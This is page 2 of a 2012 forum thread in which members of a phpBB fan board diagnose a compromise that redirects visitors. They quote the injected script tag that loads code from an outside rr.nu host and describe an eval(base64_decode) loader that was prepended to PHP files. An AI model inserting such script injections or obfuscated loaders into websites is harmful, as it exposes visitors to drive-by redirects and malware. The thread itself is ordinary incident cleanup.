Page 2 of 4

PostPosted: Thu Mar 01, 2012 14:43 +0000
by Mayhem
Pinging up the index.php source in IE8 (yes, it tried to redirect when I used that browser) reveals this at the bottom of the code:

<script src="http://sbulle06tsconti.rr.nu/nl.php?p=d"></script>

Googling that URL pulls up just one hit online for a compromise at Dreamhost:

http://community.mybb.com/thread-114345.html

Which then leads to this thread:

http://discussion.dreamhost.com/thread-134262.html

Is the Usagi Dojo on Dreamhost? If so, it might explain something. The HTACCESS file might need looking at as well.

PostPosted: Thu Mar 01, 2012 15:35 +0000
by Stormhaven
I ran into something similar a while back on a domain I was running, I'm guessing the PHPBB that the dojoboard is running is probably a few revs behind. There have been quite a few security exploits with the older versions. I had to have the host provider run a grep to find all the files with the domain inserts and manually repair them.

PostPosted: Thu Mar 01, 2012 15:44 +0000
by Todd Shogun
I use Firefox and no problems....I will see what i can do!

And yes, Dreamhost does host us

PostPosted: Thu Mar 01, 2012 16:23 +0000
by Todd Shogun
Ugh...it looks messy. This will be time-consuming. Any phpBB-savvy Members out there willing to help?

PostPosted: Thu Mar 01, 2012 22:11 +0000
by maichan
Wow, sounds serious. Hope you can get it fixed Todd!

@Stormhaven - on your advice I'm on Firefox now without any problems.
My home computer info:
Internet Explorer 9.0.8112.16421 - redirects
Firefox 10.0.2 - Does not redirect

PostPosted: Fri Mar 02, 2012 7:57 +0000
by Stan Sakai
I heard from Thomas. He has tried getting to the Dojo, but was redirected every time. I gave him the tip about using Firefox. Hopefully, that will work for him.

I've been redirected a couple of times, but not to the extent that others on this board have experienced. I use a Mac computer and Safari.

PostPosted: Fri Mar 02, 2012 8:16 +0000
by Mayhem
It does appear to be only IE, and perhaps Safari, affected. My brother and I tried different versions of IE and Firefox, and no Firefox version got redirected. All the IE browsers did.

PostPosted: Fri Mar 02, 2012 8:43 +0000
by Stormhaven
Todd, I don't know PHP but when I had to deal with this, I just manually removed the bits from the HTML. If you just need help doing that, feel free to contact me.

PostPosted: Sun Mar 04, 2012 14:19 +0000
by digulla
I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).

The board itself is still vulnerable so it's just a question of time until it happens again.

Edit The virus did two changes:

1. There was a file .log/log1.txt which contains the list of sites to redirect to.

2. At the start of each .php file, there was code like this: <?php /**/ eval(base64_decode("...."))

I'm not sure what this code did, my guess is that it kept the file above up to date plus it probably injected the code for the redirection into the HTML.

I kept the files just in case we want to analyze this further.

PostPosted: Sun Mar 04, 2012 14:23 +0000
by Mayhem
Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.

PostPosted: Sun Mar 04, 2012 14:29 +0000
by digulla
Mayhem wrote:Do you think a shift to phpBB 3 would help here? We are running quite an ancient version of 2 on the Dojo.


Yes. I just never had the time to make the update.

PostPosted: Sun Mar 04, 2012 14:39 +0000
by digulla

PostPosted: Tue Mar 06, 2012 17:27 +0000
by toine
digulla wrote:I cleaned the PHP code but the job was probably done with a script (i.e. it's an automated attack).

The board itself is still vulnerable so it's just a question of time until it happens again.


I just have been redirected... :?

(chrome under ubuntu 11.10)

Me,too....

PostPosted: Tue Mar 06, 2012 17:33 +0000
by go
Dear Readers,
I just got redirected using Firefox.
Best wishes to all!
go

PostPosted: Tue Mar 06, 2012 21:35 +0000
by Mayhem
Hmmm, somewhat worrying, but no redirect here for me.